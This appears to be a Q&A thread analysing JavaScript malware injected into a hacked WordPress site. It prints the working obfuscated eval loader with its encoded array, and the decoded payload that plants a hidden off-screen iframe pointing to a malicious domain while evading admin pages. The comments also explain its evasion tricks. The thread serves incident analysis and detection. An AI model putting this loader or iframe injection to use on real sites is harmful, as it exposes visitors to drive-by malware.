Question

My friend's WordPress site was attacked and a bunch of PHP files were injected with some eval statements, which I've inflated and decoded, but it has led me to the JavaScript below.

Anyone any ideas how to deobfuscate this so we can read what it says?

ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array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}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}

Solution

The hidden code is this:

/**
 * Random integer in the inclusive range [a, b].
 * The payload uses it to randomise the injected iframe's size and off-screen offset.
 * @param {number} a - lower bound (inclusive)
 * @param {number} b - upper bound (inclusive)
 * @returns {number} an integer between a and b
 */
function gra(a,b){
  const span = b - a + 1;
  const offset = Math.floor(Math.random() * span);
  return offset + a;
}
/**
 * Short random base-36 string (the fractional digits of Math.random() after the first three).
 * Used both as a random CSS class suffix and as the cookie value, so neither is a fixed indicator.
 * @returns {string} lowercase alphanumeric string
 */
function rs(){
  const digits = Math.random().toString(36);
  return digits.slice(5);
}
// Payload body. It only runs when cookies are enabled, because it uses a cookie (below) as a marker.
if(navigator.cookieEnabled){
  var stnm=rs();                       // random class-name suffix: the injected element has no fixed name to search for
  var ua = navigator.userAgent;
  var url = document.location.href;

  // Targeting: skipped on any URL containing 'admin' (presumably so the site owner never sees it
  // in the dashboard), and only fires for Windows user agents reporting MSIE or Opera.
  if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
    // Writes a <style> that positions the element far off-screen (negative, randomised offsets) and a
    // randomly sized iframe loading the attacker's page. Detection hint: document.write containing
    // '<iframe' together with 'position:absolute' and negative left/top offsets.
    document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
  }
  var exp=new Date();exp.setDate(exp.getDate()+7);   // cookie lifetime: 7 days
  // Drops a '__utmfr' cookie with a random value if none is present. The '__utm' prefix resembles
  // Google Analytics cookie names, likely chosen to blend in; the cookie name itself is a usable indicator.
  if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}

It's stored in the f array as plain ASCII codes, but each character is shifted by 0, 1, 2 or 3 (repeating every four characters) in a simple attempt to obfuscate the code.

Looks like this adds a bit of code to every webpage to load a malicious URL in a hidden iframe.

OTHER TIPS

First, feed it through http://jsbeautifier.org/.

You can now easily deduce that v becomes the string "eval", and e is the eval function. Also, you can run the loop that builds the string from the array items to see what it does:

/**
 * Random integer in the inclusive range [a, b].
 * The payload uses it to randomise the injected iframe's size and off-screen offset.
 * @param {number} a - lower bound (inclusive)
 * @param {number} b - upper bound (inclusive)
 * @returns {number} an integer between a and b
 */
function gra(a,b){
  const width = b - a + 1;
  const pick = Math.floor(Math.random() * width);
  return a + pick;
}
/**
 * Short random base-36 string (the fractional digits of Math.random() after the first three).
 * Used both as a random CSS class suffix and as the cookie value, so neither is a fixed indicator.
 * @returns {string} lowercase alphanumeric string
 */
function rs(){
  const encoded = Math.random().toString(36);
  return encoded.slice(5);
}
// Payload body. It only runs when cookies are enabled, because it uses a cookie (below) as a marker.
if(navigator.cookieEnabled){
    var stnm=rs();                   // random class-name suffix: the injected element has no fixed name to search for
    var ua = navigator.userAgent;
    var url = document.location.href;
    // Targeting: skipped on any URL containing 'admin' (presumably so the site owner never sees it
    // in the dashboard), and only fires for Windows user agents reporting MSIE or Opera.
    if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
        // Writes a <style> that positions the element far off-screen (negative, randomised offsets) and a
        // randomly sized iframe loading the attacker's page. Detection hint: document.write containing
        // '<iframe' together with 'position:absolute' and negative left/top offsets.
        document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
    }
    var exp=new Date();exp.setDate(exp.getDate()+7);   // cookie lifetime: 7 days
    // Drops a '__utmfr' cookie with a random value if none is present. The '__utm' prefix resembles
    // Google Analytics cookie names, likely chosen to blend in; the cookie name itself is a usable indicator.
    if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}

Now it is quite obvious: It sets a random identifier cookie, and for every IE/Opera user on Windows who does not browse an "admin" url, it creates an iframe which is positioned off-screen. The iframe likely contains some drive-by-download of malware.

I just pasted this into http://jsbeautifier.org/... Good luck!

// --- Stage 1: browser probe and indirect lookup of eval ---
// Every name here is an implicit global (no var/let); the loader relies on sloppy mode.
// In a non-browser evaluator `window` is undefined and the first line throws, so the script
// never reaches eval outside a real page.
ww = window;
v = "v" + "al";                  // "val"; the leading "e" is only prepended inside the catch below
if (ww.document) try {
    document.body = 12;          // the author relies on this throwing in a browser (document.body only accepts an element)
} catch (gdsgsdg) {
    asd = 0;
    try {
        d = document             // second existence check for `document`; asd stays 0 if it resolves
    } catch (agdsg) {
        asd = 1;
    }
    if (!asd) {
        w = {
            a: ww
        }.a;                     // w = window, routed through an object literal so `window[...]` never appears literally
        v = "e".concat(v);       // v = "eval"; the word is never spelled out in the source
    }
}
e = w[v];                        // e = window.eval. If the catch path was not taken, w is unassigned and this throws.
// --- Stage 2: the payload as shifted character codes ---
// `if (1)` is always true and is just noise. Each code is stored with (index % 4) subtracted,
// which the decode loop below adds back via e("j%4"), so plain-text strings like "iframe" or
// "document.write" cannot be found by searching the array. (Decoded: index 0..17 spell "function gra(a,b){".)
if (1) {
    f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 
44, 37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122);
}
// --- Stage 3: decode the array and execute it ---
w = f;
s = [];                                  // starts as an empty array; `[] + "x"` coerces it to "" so s becomes a string
for (i = 0; - i + 800 != 0; i += 1) {    // `i < 800` written obscurely; 800 is presumably the array length
    j = i;
    // 031 is octal 25 == 0x19, so the first condition is always true (noise). e("j%4") evaluates the
    // string "j%4" against the global j, giving the 0..3 shift that undoes the encoding of each code.
    if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
}
xz = e;                                  // alias for eval so the call below does not reference `e` directly
try {
    document.body++                      // same throw-in-a-browser probe as in Stage 1
} catch (gdsgd) {
    xz(s)                                // eval of the decoded payload happens only inside the catch
}
Licensed under: CC-BY-SA with attribution